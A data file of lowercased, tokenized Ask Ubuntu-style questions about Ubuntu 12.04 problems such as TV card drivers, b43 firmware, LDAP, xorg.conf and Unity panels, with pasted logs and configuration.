181003	sync custom dictionary : firefox & libreoffice & ubuntu & ms office in windows	something i 've wanted to do for years is have all custom dictionaries synching so i never have to add the same words ever again . there are some guides for how to sync windows ms office dictionaries across windows machines using dropbox/similar , since ms office allows one to move the custom dictionary file and point office to it ( i.e. , in the dropbox folder ) . there 's a guide for how to do this with firefox in windows , using a program called syncback to sync the firefox dictionary between its location and dropbox , so this would keep all firefox dictionaries synched , probably irrespective of os . [ edit : can use hard symbolic links to do this in windows & linux : http : //www.howtogeek.com/howto/16226/complete-guide-to-symbolic-links-symlinks-on-windows-or-linux/ ] what i really want : a way to sync all dictionaries , all the time . i dual boot between ubuntu & winxp at home , and i have winxp in the office which will be windows 7 . this seems like 4 problems : office on windows ( easy ) firefox , os unimportant ( relatively easy with symbolic link ) libreoffice on ubuntu ( potentially easy with symbolic links : http : //comments.gmane.org/gmane.comp.documentfoundation.libreoffice.user/17000 ) sharing/syncing/merging ms office 's custom.dic , firefox 's prefdict.dat and libreoffice 's standard.dic . number 4 seems like the biggie . my guess would be that libreoffice & word synching looks easiest simply because they 're similar programs and use the same extension - i 've not looked at the structures . can anyone pitch in with any ideas on how to accomplish this ? it seems like this is a problem that ( somewhat ) plagues users of all oss and text entry programs , that lends itself to cloud syncing more than many things ( tiny files ) , and yet is still stuck in the wilderness ...
181004	getting the external hard-drive faster into standby	currently , my external hard-drive is going into standby after 15 minutes of inactivity . how can i reduce this period to e.g . 5 minutes ? using ubuntu 12.04 64-bit with gnome shell . thanks in advance !
181008	is there an easy way to change ubuntu flavor during upgrade ?	i used to run ubuntu netbook edition ( une ) 10.04 on my asus eee 901 . i recently upgraded to the `` regular '' ubuntu desktop 11.10 , since une was discontinued . due to the limited hardware , my netbook has become slow , which is why i want to switch to lubuntu . can this switch be done easily in connection with a normal upgrade process ? ie can i install a package or edit a software sources-file somewhere , that will alter my upgrade path to lubuntu , so that i do n't have to do a complete reinstallation ?
181011	how do i completeley uninstall tvtime ?	can anyone recommend how to completely un-install tvtime and reinstall it as i have a problem where it will not 'see ' my tv card at all . it will not let me change input from 'default ' either . i am running ubuntu 12.04lts tvtime 1.0.2 tv card peak 138508agpk dvb-t digital tv hybrid pci card i have tried uninstalling before but it leaves traces of itself so that when i reinstall it , it doesnât ask where i am in relation to pal/ntsc . also , how do i set up channels , i really only need one as i am using a virgin media tivo box ( uk ) some techspec on the device -multimedia description : multimedia controller product : saa7131/saa7133/saa7135 video broadcast decoder vendor : philips semiconductors physical id : 7 bus info : pci @ 0000:03:07.0 version : d1 width : 32 bits clock : 33mhz capabilities : pm bus_master cap_list configuration : driver=saa7134 latency=64 maxlatency=255 mingnt=255 resources : irq:21 memory : fbfef800-fbfeffff more info ; [ 30.791553 ] saa7130/34 : v4l2 driver version 0 , 2 , 17 loaded [ 30.798887 ] saa7134 0000:03:07.0 : pci int a - > gsi 21 ( level , low ) - > irq 21 [ 30.798894 ] saa7133 [ 0 ] : found at 0000:03:07.0 , rev : 209 , irq : 21 , latency : 64 , mmio : 0xfbfef800 [ 30.798902 ] saa7134 : < rant > [ 30.798902 ] saa7134 : congratulations ! your tv card vendor saved a few [ 30.798903 ] saa7134 : cents for a eeprom , thus your pci board has no [ 30.798904 ] saa7134 : subsystem id and i ca n't identify it automatically [ 30.798905 ] saa7134 : < /rant > [ 30.798906 ] saa7134 : i feel better now . ok , here are the good news : [ 30.798906 ] saa7134 : you can use the card= < nr > insmod option to specify [ 30.798907 ] saa7134 : which board do you have . the list : [ 30.798910 ] saa7134 : card=0 - > unknown/generic [ 30.798916 ] saa7134 : card=1 - > proteus pro [ philips reference design ] 1131:2001 1131:2001 [ 30.798920 ] saa7134 : card=2 - > lifeview flyvideo3000 5168:0138 4e42:0138 [ 30.798924 ] saa7134 : card=3 - > lifeview/typhoon flyvideo2000 5168:0138 4e42:0138 [ 30.798927 ] saa7134 : card=4 - > empress 1131:6752 [ 30.798930 ] saa7134 : card=5 - > sknet monster tv 1131:4e85 [ 30.798933 ] saa7134 : card=6 - > tevion md 9717 [ 30.798936 ] saa7134 : card=7 - > knc one tv-station rds / typhoon tv tune 1131 : fe01 1894 : fe01 [ 30.798940 ] saa7134 : card=8 - > terratec cinergy 400 tv 153b:1142 [ 30.798943 ] saa7134 : card=9 - > medion 5044 [ 30.798945 ] saa7134 : card=10 - > kworld/kuroutoshikou saa7130-tvpci [ 30.798948 ] saa7134 : card=11 - > terratec cinergy 600 tv 153b:1143 [ 30.798951 ] saa7134 : card=12 - > medion 7134 16be:0003 16be:5000 [ 30.798955 ] saa7134 : card=13 - > typhoon tv+radio 90031 [ 30.798957 ] saa7134 : card=14 - > elsa ex-vision 300tv 1048:226b [ 30.798960 ] saa7134 : card=15 - > elsa ex-vision 500tv 1048:226a [ 30.798963 ] saa7134 : card=16 - > asus tv-fm 7134 1043:4842 1043:4830 1043:4840 [ 30.798967 ] saa7134 : card=17 - > aopen va1000 power 1131:7133 [ 30.798970 ] saa7134 : card=18 - > bmk mpex no tuner [ 30.798973 ] saa7134 : card=19 - > compro videomate tv 185b : c100 [ 30.798976 ] saa7134 : card=20 - > matrox cronosplus 102b:48d0 [ 30.798979 ] saa7134 : card=21 - > 10moons pci tv capture card 1131:2001 [ 30.798982 ] saa7134 : card=22 - > avermedia m156 / medion 2819 1461 : a70b [ 30.798985 ] saa7134 : card=23 - > bmk mpex tuner [ 30.798987 ] saa7134 : card=24 - > knc one tv-station dvr 1894 : a006 [ 30.798990 ] saa7134 : card=25 - > asus tv-fm 7133 1043:4843 [ 30.798993 ] saa7134 : card=26 - > pinnacle pctv stereo ( saa7134 ) 11bd:002b [ 30.798997 ] saa7134 : card=27 - > manli muchtv m-tv002 [ 30.798999 ] saa7134 : card=28 - > manli muchtv m-tv001 [ 30.799002 ] saa7134 : card=29 - > nagase sangyo transgear 3000tv 1461:050c [ 30.799005 ] saa7134 : card=30 - > elitegroup ecs tvp3xp fm1216 tuner card ( 1019:4cb4 [ 30.799008 ] saa7134 : card=31 - > elitegroup ecs tvp3xp fm1236 tuner card 1019:4cb5 [ 30.799011 ] saa7134 : card=32 - > avacs smarttv [ 30.799013 ] saa7134 : card=33 - > avermedia dvd ezmaker 1461:10ff [ 30.799016 ] saa7134 : card=34 - > noval prime tv 7133 [ 30.799019 ] saa7134 : card=35 - > avermedia avertv studio 305 1461:2115 [ 30.799022 ] saa7134 : card=36 - > upmost purple tv 12ab:0800 [ 30.799025 ] saa7134 : card=37 - > items muchtv plus / it-005 [ 30.799028 ] saa7134 : card=38 - > terratec cinergy 200 tv 153b:1152 [ 30.799031 ] saa7134 : card=39 - > lifeview flytv platinum mini 5168:0212 4e42:0212 5169:1502 [ 30.799035 ] saa7134 : card=40 - > compro videomate tv pvr/fm 185b : c100 [ 30.799038 ] saa7134 : card=41 - > compro videomate tv gold+ 185b : c100 [ 30.799041 ] saa7134 : card=42 - > sabrent sbt-tvfm ( saa7130 ) [ 30.799043 ] saa7134 : card=43 - > : zolid xpert tv7134 [ 30.799046 ] saa7134 : card=44 - > empire pci tv-radio le [ 30.799048 ] saa7134 : card=45 - > avermedia avertv studio 307 1461:9715 [ 30.799051 ] saa7134 : card=46 - > avermedia cardbus tv/radio ( e500 ) 1461 : d6ee [ 30.799054 ] saa7134 : card=47 - > terratec cinergy 400 mobile 153b:1162 [ 30.799057 ] saa7134 : card=48 - > terratec cinergy 600 tv mk3 153b:1158 [ 30.799060 ] saa7134 : card=49 - > compro videomate gold+ pal 185b : c200 [ 30.799063 ] saa7134 : card=50 - > pinnacle pctv 300i dvb-t + pal 11bd:002d [ 30.799067 ] saa7134 : card=51 - > provideo pv952 1540:9524 [ 30.799070 ] saa7134 : card=52 - > avermedia avertv/305 1461:2108 [ 30.799073 ] saa7134 : card=53 - > asus tv-fm 7135 1043:4845 [ 30.799076 ] saa7134 : card=54 - > lifeview flytv platinum fm / gold 5168:0214 5168:5214 1489:0214 5168:0304 [ 30.799080 ] saa7134 : card=55 - > lifeview flydvb-t duo / msi tv @ nywhere d 5168:0306 4e42:0306 [ 30.799084 ] saa7134 : card=56 - > avermedia avertv 307 1461 : a70a [ 30.799087 ] saa7134 : card=57 - > avermedia avertv go 007 fm 1461 : f31f [ 30.799090 ] saa7134 : card=58 - > ads tech instant tv ( saa7135 ) 1421:0350 1421:0351 1421:0370 1421:1370 [ 30.799095 ] saa7134 : card=59 - > kworld/tevion v-stream xpert tv pvr7134 [ 30.799097 ] saa7134 : card=60 - > lifeview/typhoon/genius flydvb-t duo car 5168:0502 4e42:0502 1489:0502 [ 30.799101 ] saa7134 : card=61 - > philips tough dvb-t reference design 1131:2004 [ 30.799104 ] saa7134 : card=62 - > compro videomate tv gold+ii [ 30.799107 ] saa7134 : card=63 - > kworld xpert tv pvr7134 [ 30.799109 ] saa7134 : card=64 - > flytv mini asus digimatrix 1043:0210 [ 30.799112 ] saa7134 : card=65 - > v-stream studio tv terminator [ 30.799115 ] saa7134 : card=66 - > yuan tun-900 ( saa7135 ) [ 30.799117 ] saa7134 : card=67 - > beholder beholdtv 409 fm 0000:4091 [ 30.799120 ] saa7134 : card=68 - > gotview 7135 pci 5456:7135 [ 30.799124 ] saa7134 : card=69 - > philips europa v3 reference design 1131:2004 [ 30.799127 ] saa7134 : card=70 - > compro videomate dvb-t300 185b : c900 [ 30.799130 ] saa7134 : card=71 - > compro videomate dvb-t200 185b : c901 [ 30.799133 ] saa7134 : card=72 - > rtd embedded technologies vfg7350 1435:7350 [ 30.799136 ] saa7134 : card=73 - > rtd embedded technologies vfg7330 1435:7330 [ 30.799139 ] saa7134 : card=74 - > lifeview flytv platinum mini2 14c0:1212 [ 30.799142 ] saa7134 : card=75 - > avermedia avertvhd mce a180 1461:1044 [ 30.799145 ] saa7134 : card=76 - > sknet monstertv mobile 1131:4ee9 [ 30.799148 ] saa7134 : card=77 - > pinnacle pctv 40i/50i/110i ( saa7133 ) 11bd:002e [ 30.799151 ] saa7134 : card=78 - > asustek p7131 dual 1043:4862 [ 30.799154 ] saa7134 : card=79 - > sedna/muchtv pc tv cardbus tv/radio ( ito [ 30.799157 ] saa7134 : card=80 - > asus digimatrix tv 1043:0210 [ 30.799160 ] saa7134 : card=81 - > philips tiger reference design 1131:2018 [ 30.799163 ] saa7134 : card=82 - > msi tv @ anywhere plus 1462:6231 1462:8624 [ 30.799166 ] saa7134 : card=83 - > terratec cinergy 250 pci tv 153b:1160 [ 30.799169 ] saa7134 : card=84 - > lifeview flydvb trio 5168:0319 [ 30.799172 ] saa7134 : card=85 - > avertv dvb-t 777 1461:2c05 1461:2c05 [ 30.799176 ] saa7134 : card=86 - > lifeview flydvb-t / genius videowonder d 5168:0301 1489:0301 [ 30.799180 ] saa7134 : card=87 - > ads instant tv duo cardbus ptv331 0331:1421 [ 30.799183 ] saa7134 : card=88 - > tevion/kworld dvb-t 220rf 17de:7201 [ 30.799186 ] saa7134 : card=89 - > elsa ex-vision 700tv 1048:226c [ 30.799189 ] saa7134 : card=90 - > kworld atsc110/115 17de:7350 17de:7352 [ 30.799192 ] saa7134 : card=91 - > avermedia a169 b 1461:7360 [ 30.799195 ] saa7134 : card=92 - > avermedia a169 b1 1461:6360 [ 30.799199 ] saa7134 : card=93 - > medion 7134 bridge # 2 16be:0005 [ 30.799202 ] saa7134 : card=94 - > lifeview flydvb-t hybrid cardbus/msi tv 5168:3306 5168:3502 5168:3307 4e42:3502 [ 30.799206 ] saa7134 : card=95 - > lifeview flyvideo3000 ( ntsc ) 5169:0138 [ 30.799209 ] saa7134 : card=96 - > medion md8800 quadro 16be:0007 16be:0008 16be:000d [ 30.799213 ] saa7134 : card=97 - > lifeview flydvb-s /acorp tv134ds 5168:0300 4e42:0300 [ 30.799217 ] saa7134 : card=98 - > proteus pro 2309 0919:2003 [ 30.799220 ] saa7134 : card=99 - > avermedia tv hybrid a16ar 1461:2c00 [ 30.799223 ] saa7134 : card=100 - > asus europa2 oem 1043:4860 [ 30.799226 ] saa7134 : card=101 - > pinnacle pctv 310i 11bd:002f [ 30.799229 ] saa7134 : card=102 - > avermedia avertv studio 507 1461:9715 [ 30.799232 ] saa7134 : card=103 - > compro videomate dvb-t200a [ 30.799235 ] saa7134 : card=104 - > hauppauge wintv-hvr1110 dvb-t/hybrid 0070:6700 0070:6701 0070:6702 0070:6703 0070:6704 0070:6705 [ 30.799240 ] saa7134 : card=105 - > terratec cinergy ht pcmcia 153b:1172 [ 30.799243 ] saa7134 : card=106 - > encore enltv 1131:2342 1131:2341 3016:2344 [ 30.799247 ] saa7134 : card=107 - > encore enltv-fm 1131:230f [ 30.799250 ] saa7134 : card=108 - > terratec cinergy ht pci 153b:1175 [ 30.799254 ] saa7134 : card=109 - > philips tiger - s reference design [ 30.799256 ] saa7134 : card=110 - > avermedia m102 1461 : f31e [ 30.799259 ] saa7134 : card=111 - > asus p7131 4871 1043:4871 [ 30.799262 ] saa7134 : card=112 - > asustek p7131 hybrid 1043:4876 [ 30.799265 ] saa7134 : card=113 - > elitegroup ecs tvp3xp fm1246 tuner card 1019:4cb6 [ 30.799268 ] saa7134 : card=114 - > kworld dvb-t 210 17de:7250 [ 30.799271 ] saa7134 : card=115 - > sabrent pcmcia tv-pcb05 0919:2003 [ 30.799274 ] saa7134 : card=116 - > 10moons tm300 tv card 1131:2304 [ 30.799277 ] saa7134 : card=117 - > avermedia super 007 1461 : f01d [ 30.799280 ] saa7134 : card=118 - > beholder beholdtv 401 0000:4016 [ 30.799284 ] saa7134 : card=119 - > beholder beholdtv 403 0000:4036 [ 30.799287 ] saa7134 : card=120 - > beholder beholdtv 403 fm 0000:4037 [ 30.799290 ] saa7134 : card=121 - > beholder beholdtv 405 0000:4050 [ 30.799293 ] saa7134 : card=122 - > beholder beholdtv 405 fm 0000:4051 [ 30.799296 ] saa7134 : card=123 - > beholder beholdtv 407 0000:4070 [ 30.799299 ] saa7134 : card=124 - > beholder beholdtv 407 fm 0000:4071 [ 30.799302 ] saa7134 : card=125 - > beholder beholdtv 409 0000:4090 [ 30.799305 ] saa7134 : card=126 - > beholder beholdtv 505 fm 5ace:5050 [ 30.799308 ] saa7134 : card=127 - > beholder beholdtv 507 fm / beholdtv 509 5ace:5070 5ace:5090 [ 30.799312 ] saa7134 : card=128 - > beholder beholdtv columbus tv/fm 0000:5201 [ 30.799315 ] saa7134 : card=129 - > beholder beholdtv 607 fm 5ace:6070 [ 30.799318 ] saa7134 : card=130 - > beholder beholdtv m6 5ace:6190 [ 30.799321 ] saa7134 : card=131 - > twinhan hybrid dtv-dvb 3056 pci 1822:0022 [ 30.799324 ] saa7134 : card=132 - > genius tvgo am11mce [ 30.799327 ] saa7134 : card=133 - > nxp snake dvb-s reference design [ 30.799329 ] saa7134 : card=134 - > medion/creatix ctx953 hybrid 16be:0010 [ 30.799332 ] saa7134 : card=135 - > msi tv @ nywhere a/d v1.1 1462:8625 [ 30.799335 ] saa7134 : card=136 - > avermedia cardbus tv/radio ( e506r ) 1461 : f436 [ 30.799338 ] saa7134 : card=137 - > avermedia hybrid tv/radio ( a16d ) 1461 : f936 [ 30.799341 ] saa7134 : card=138 - > avermedia m115 1461 : a836 [ 30.799344 ] saa7134 : card=139 - > compro videomate t750 185b : c900 [ 30.799347 ] saa7134 : card=140 - > avermedia dvb-s pro a700 1461 : a7a1 [ 30.799350 ] saa7134 : card=141 - > avermedia dvb-s hybrid+fm a700 1461 : a7a2 [ 30.799353 ] saa7134 : card=142 - > beholder beholdtv h6 5ace:6290 [ 30.799356 ] saa7134 : card=143 - > beholder beholdtv m63 5ace:6191 [ 30.799360 ] saa7134 : card=144 - > beholder beholdtv m6 extra 5ace:6193 [ 30.799363 ] saa7134 : card=145 - > avermedia minipci dvb-t hybrid m103 1461 : f636 1461 : f736 [ 30.799366 ] saa7134 : card=146 - > asustek p7131 analog [ 30.799369 ] saa7134 : card=147 - > asus tiger 3in1 1043:4878 [ 30.799372 ] saa7134 : card=148 - > encore enltv-fm v5.3 1a7f:2008 [ 30.799375 ] saa7134 : card=149 - > avermedia pci pure analog ( m135a ) 1461 : f11d [ 30.799378 ] saa7134 : card=150 - > zogis real angel 220 [ 30.799380 ] saa7134 : card=151 - > ads tech instant hdtv 1421:0380 [ 30.799383 ] saa7134 : card=152 - > asus tiger rev:1.00 1043:4857 [ 30.799387 ] saa7134 : card=153 - > kworld plus tv analog lite pci 17de:7128 [ 30.799390 ] saa7134 : card=154 - > avermedia avertv go 007 fm plus 1461 : f31d [ 30.799393 ] saa7134 : card=155 - > hauppauge wintv-hvr1150 atsc/qam-hybrid 0070:6706 0070:6708 [ 30.799396 ] saa7134 : card=156 - > hauppauge wintv-hvr1120 dvb-t/hybrid 0070:6707 0070:6709 0070:670a [ 30.799400 ] saa7134 : card=157 - > avermedia avertv studio 507ua 1461 : a11b [ 30.799403 ] saa7134 : card=158 - > avermedia cardbus tv/radio ( e501r ) 1461 : b7e9 [ 30.799407 ] saa7134 : card=159 - > beholder beholdtv 505 rds 0000:505b [ 30.799410 ] saa7134 : card=160 - > beholder beholdtv 507 rds 0000:5071 [ 30.799413 ] saa7134 : card=161 - > beholder beholdtv 507 rds 0000:507b [ 30.799416 ] saa7134 : card=162 - > beholder beholdtv 607 fm 5ace:6071 [ 30.799419 ] saa7134 : card=163 - > beholder beholdtv 609 fm 5ace:6090 [ 30.799422 ] saa7134 : card=164 - > beholder beholdtv 609 fm 5ace:6091 [ 30.799425 ] saa7134 : card=165 - > beholder beholdtv 607 rds 5ace:6072 [ 30.799428 ] saa7134 : card=166 - > beholder beholdtv 607 rds 5ace:6073 [ 30.799431 ] saa7134 : card=167 - > beholder beholdtv 609 rds 5ace:6092 [ 30.799434 ] saa7134 : card=168 - > beholder beholdtv 609 rds 5ace:6093 [ 30.799437 ] saa7134 : card=169 - > compro videomate s350/s300 185b : c900 [ 30.799440 ] saa7134 : card=170 - > avermedia avertv studio 505 1461 : a115 [ 30.799443 ] saa7134 : card=171 - > beholder beholdtv x7 5ace:7595 [ 30.799446 ] saa7134 : card=172 - > rovermedia tv link pro fm 19d1:0138 [ 30.799449 ] saa7134 : card=173 - > zolid hybrid tv tuner pci 1131:2004 [ 30.799452 ] saa7134 : card=174 - > asus europa hybrid oem 1043:4847 [ 30.799455 ] saa7134 : card=175 - > leadtek winfast dtv1000s 107d:6655 [ 30.799458 ] saa7134 : card=176 - > beholder beholdtv 505 rds 0000:5051 [ 30.799461 ] saa7134 : card=177 - > hawell hw-404m7 [ 30.799464 ] saa7134 : card=178 - > beholder beholdtv h7 5ace:7190 [ 30.799467 ] saa7134 : card=179 - > beholder beholdtv a7 5ace:7090 [ 30.799470 ] saa7134 : card=180 - > avermedia pci m733a 1461:4155 1461:4255 [ 30.799474 ] saa7134 : card=181 - > techotrend tt-budget t-3000 13c2:2804 [ 30.799477 ] saa7134 : card=182 - > kworld pci sbtvd/isdb-t full-seg hybrid 17de : b136 [ 30.799480 ] saa7134 : card=183 - > compro videomate vista m1f 185b : c900 [ 30.799483 ] saa7134 : card=184 - > encore enltv-fm 3 1a7f:2108 [ 30.799486 ] saa7134 : card=185 - > magicpro prohdtv pro2 dmb-th/hybrid 17de : d136 [ 30.799489 ] saa7134 : card=186 - > beholder beholdtv 501 5ace:5010 [ 30.799492 ] saa7134 : card=187 - > beholder beholdtv 503 fm 5ace:5030 [ 30.799496 ] saa7133 [ 0 ] : subsystem : 17de:7253 , board : unknown/generic [ card=0 , autodetected ] [ 30.799520 ] saa7133 [ 0 ] : board init : gpio is 100 [ 30.880272 ] ext4-fs ( sda1 ) : re-mounted . opts : errors=remount-ro [ 30.882137 ] device-mapper : multipath : version 1.3.0 loaded [ 30.952040 ] saa7133 [ 0 ] : i2c eeprom 00 : de 17 53 72 ff ff ff ff ff ff ff ff ff ff ff ff [ 30.952049 ] saa7133 [ 0 ] : i2c eeprom 10 : ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff [ 30.952056 ] saa7133 [ 0 ] : i2c eeprom 20 : ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff [ 30.952063 ] saa7133 [ 0 ] : i2c eeprom 30 : ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff [ 30.952069 ] saa7133 [ 0 ] : i2c eeprom 40 : ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff [ 30.952076 ] saa7133 [ 0 ] : i2c eeprom 50 : ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff [ 30.952082 ] saa7133 [ 0 ] : i2c eeprom 60 : ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff [ 30.952088 ] saa7133 [ 0 ] : i2c eeprom 70 : ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff [ 30.952095 ] saa7133 [ 0 ] : i2c eeprom 80 : ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff [ 30.952101 ] saa7133 [ 0 ] : i2c eeprom 90 : ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff [ 30.952108 ] saa7133 [ 0 ] : i2c eeprom a0 : ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff [ 30.952114 ] saa7133 [ 0 ] : i2c eeprom b0 : ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff [ 30.952120 ] saa7133 [ 0 ] : i2c eeprom c0 : ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff [ 30.952127 ] saa7133 [ 0 ] : i2c eeprom d0 : ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff [ 30.952133 ] saa7133 [ 0 ] : i2c eeprom e0 : ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff [ 30.952140 ] saa7133 [ 0 ] : i2c eeprom f0 : ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff [ 30.954319 ] saa7133 [ 0 ] : registered device video0 [ v4l2 ] [ 30.954380 ] saa7133 [ 0 ] : registered device vbi0 [ 30.984113 ] saa7134 alsa driver for dma sound loaded [ 30.984147 ] saa7133 [ 0 ] /alsa : saa7133 [ 0 ] at 0xfbfef800 irq 21 registered as card -2
181023	how to remove sound in take screenshot ?	after reinstalling lubuntu 12.04 and take screenshot , i have a typical picture camera shot sound whenever i use the program , and can not find the settings to change that . i do not remember ever having to remove the sound during using it before .
181029	how do i handle `` firmware file x not found '' stopping bootup ?	i recently upgraded my desktop mac to precise and now ca n't get past the ubuntu 12.04 splash page . the splash freezes with [ 19.931097 ] b32-phy0 error : firmware file `` b43/ucode16_mimo.fw '' not found [ 19.9311126 ] b32-phy0 error : you must go to http : //wireless.kernel.org/en/users/drivers/b43 # devicefirmware and download the correct firmware for this driver version . please carefully read all instructions on this website . written on it this is when i choose 3.2.0-generic from the grub menu . if i choose to load up older kernels , i still get the same thing . how can i make my computer finish booting again ? i 'm able to ssh into the machine and poke around , but the actual screen freezes at the splash . the firmware error is now gone , but i still ca n't get past the splash screen dmesg cat kern.log
181037	aklog : a pioctl failed while obtaining tokens for cell xxx - what to do ?	os was changed from ubuntu 11.04 to ubuntu 12.04.lts . now i can not reach my remote directories : kinit -5 user @ xxxx aklog xxxx these worked before . what to do now ?
181039	problem with minimized window to bottom gnome panel	it 's difficult to explain , because english is not my native language , but here you have a few screenshots . did n't work for me why it becomes white and how to change it ? i 'm using : ubuntu 12.04 64bit gnome classic blue ambience theme
181041	how is the loopback device implemented ?	the loopback networking interface is a virtual network device implemented entirely in software . but how is this implementation actually accomplished and how do you manipulate it ? as far as i know , ips are marked as local in the local routing table : ip route show table local sending to an ip marked as local will trigger the loopback device . but is this detection done by purely by routing tables or also by some other kernel operations ? edit : my ultimate goal is to manipulate the loop-device configuration , so that sending datagrams among my interfaces ( two wlan adapters ) on my laptop will result in real traffic / datagrams in the network and not in local loops . interface 1 - > wlan - > interface 2 and not : interface 1 - > loop - > interface 2
181047	i have ubuntu 12.04 installed on my pc and the pc hangs and does not restart more ( translated )	translated from google my pc is an intel atom + yes , it came with windows 7 , formatted and installed ubuntu 12.04 , but the pc is unstable , it will not turn off properly and alone , appearing msg that there is no image signal , what to do ? meu pc é um sim+ intel aton , veio com o windows 7 , formatei e instalei o ubuntu 12.04 , mas o pc está instavel , ele não liga corretamente e desliga sozinho , aparecendo a msg que não ha sinal de imagem , o que fazer ?
181048	external monitor does not correctly display on gma500	asus `` t91mt '' ( resolution 1024x600 ) . external monitor 17 '' vga 1280x1024 . ubuntu 12.04.1 . gma500 . i have solved a common gma500 issue of resolution own display , but i ca n't connect external monitor correctly . the picture of external monitor is shown on 75 % field . i mean i can see whole picture of desktop on 75 % filed of view only , but other 25 % is black color or plume ( tail ) of console . addition info : xrandr does not see second screen ( only default ) . i have modified grub file for optimization memory and resolution ( 1024x600 ) both at wiki-poulsbo and it did not help . my new xorg.conf is : section `` serverlayout '' identifier `` x.org configured '' screen 0 `` screen0 '' 0 0 screen 1 `` screen1 '' rightof `` screen0 '' inputdevice `` mouse0 '' `` corepointer '' inputdevice `` keyboard0 '' `` corekeyboard '' endsection section `` module '' load `` extmod '' load `` dbe '' load `` dri '' load `` glx '' load `` record '' load `` dri2 '' endsection section `` monitor '' identifier `` monitor0 '' vendorname `` monitor vendor '' modelname `` monitor model '' endsection section `` monitor '' identifier `` monitor1 '' vendorname `` monitor vendor '' modelname `` monitor model '' endsection section `` device '' # # # available driver options are : - # # # values : : integer , : float , : `` true '' / '' false '' , # # # : `` string '' , : `` hz/khz/mhz '' , # # # : `` % '' # # # [ arg ] : arg optional # option `` shadowfb '' # [ ] # option `` rotate '' # # option `` fbdev '' # # option `` debug '' # [ ] identifier `` card0 '' driver `` fbdev '' busid `` pci:0:2:0 '' endsection section `` device '' # # # available driver options are : - # # # values : : integer , : float , : `` true '' / '' false '' , # # # : `` string '' , : `` hz/khz/mhz '' , # # # : `` % '' # # # [ arg ] : arg optional # option `` shadowfb '' # [ ] # option `` defaultrefresh '' # [ ] # option `` modesetclearscreen '' # [ ] identifier `` card1 '' driver `` vesa '' busid `` pci:0:2:0 '' endsection section `` screen '' identifier `` screen0 '' device `` card0 '' monitor `` monitor0 '' subsection `` display '' viewport 0 0 depth 1 endsubsection subsection `` display '' viewport 0 0 depth 4 endsubsection subsection `` display '' viewport 0 0 depth 8 endsubsection subsection `` display '' viewport 0 0 depth 15 endsubsection subsection `` display '' viewport 0 0 depth 16 endsubsection subsection `` display '' viewport 0 0 depth 24 endsubsection endsection
181054	installation problems acer 4750g ubuntu 12.04 dual boot	i 've been playing with ubuntu the past few weeks via wubi and finally decided to give it its own space in my hdd through dual booting via separate partitions . after installation , the system could not detect ubuntu , even after explicitly adding grub2 via easybcd . desperate for answers , i googled and came across this : http : //www.worldofnubcraft.com/1825/grub2-issues-with-ubuntu-12-04-installation/ and also another post http : //ubuntuforums.org/archive/index.php/t-1434354.html and right now , my computer wo n't boot up anymore , it just says operating system not found .
181059	gcc 4.3 not in repository anymore ?	matlab has been so nice not to update its supported compilers . the latest version supported that supports the so-called mex-files is gcc-4.3.4 . now , this version also seems to be deleted from the repository . is this correct ? is it possible to support it again ? i 've been trying to install 4.3 with a variety of methods proposed around on the net , but this is getting rather cumbersome compared to the straight forward method the apt-get provides .
181060	ca n't download or remove software	nothing works , whether it 's an update , or software , or anything , even on synaptic . i found another similar thread , and tried that but that did n't work . synaptic is giving me the following message : e : avg2012flx : subprocess installed post-installation script returned error exit status 1 the software center gave me this message : installarchives ( ) failed : ( reading database ... ( reading database ... 5 % ( reading database ... 10 % ( reading database ... 15 % ( reading database ... 20 % ( reading database ... 25 % ( reading database ... 30 % ( reading database ... 35 % ( reading database ... 40 % ( reading database ... 45 % ( reading database ... 50 % ( reading database ... 55 % ( reading database ... 60 % ( reading database ... 65 % ( reading database ... 70 % ( reading database ... 75 % ( reading database ... 80 % ( reading database ... 85 % ( reading database ... 90 % ( reading database ... 95 % ( reading database ... 100 % ( reading database ... 224115 files and directories currently installed . ) removing testdisk-dbg ... removing testdisk ... processing triggers for man-db ... setting up avg2012flx ( 2012.1793 ) ... installing 'avgd ' service initscripts ... ln : failed to create symbolic link `/etc/init.d/avgd ' : file exists dpkg : error processing avg2012flx ( -- configure ) : subprocess installed post-installation script returned error exit status 1
181063	from where can i download the source code of the original kernel developed by linus torvalds ?	the question might seem a bit not related to ubuntu . please forgive me for this . as the subject says i want to download the source code of the first ever kernel developed . i have read that it was developed linus torvalds . any suggestions please ?
181069	can i force all new windows to maximize ?	maybe it will run by any hidden process ( deamon ) ? how can i do it ? ubuntu 12.04
181070	could not connect to any ldap server as ( null ) error	i am using a windows 2008 server as my ldap server and on a ubuntu 12.04 client i am trying to connect to it . i get the following error : nss_ldap : could not connect to any ldap server as ( null ) - ca n't contact ldap server from my ubuntu client i run the following : ldapsearch -h 10.1.1.251 -d admin -w password -s base dc=ad , dc=xxx , dc=com -p 389 and get the following success message # search result search : 2 result : 0 success any help would be greatly appreciated .
181071	launchbar + panel overlaps when showing a dialog box in fullscreen	i 'm developing a program for 12.04 that will run on full-screen , so i would like to have full control of what appears on the screen . however , when i show another window ( possibly a dialog/message box ) , the unity panel and launcher appears on the top and left side of the screen . i 've experienced this behavior with other applications ( firefox , gnubg ) as well when in full-screen mode . i tried to play with the settings , now my dialog box is hidden from the the taskbar , set to float on it 's parent , which is my full screen window . the problem still exists . is there a way to prevent these panels from showing up , when the new window is n't shown in taskbar , or it 's parent is a full-screen window ? or do i need to completely disable them ?
181074	ppa for bleeding edge version of unity	i have been reading about some great new features in ubuntu 12.10 's unity , like photo lens and right click actions and so on , but i do n't want to upgrade due to missing features and bugs in the current ( very early ) build of 12.10 . so can i just get the unity version used in 12.10 ?
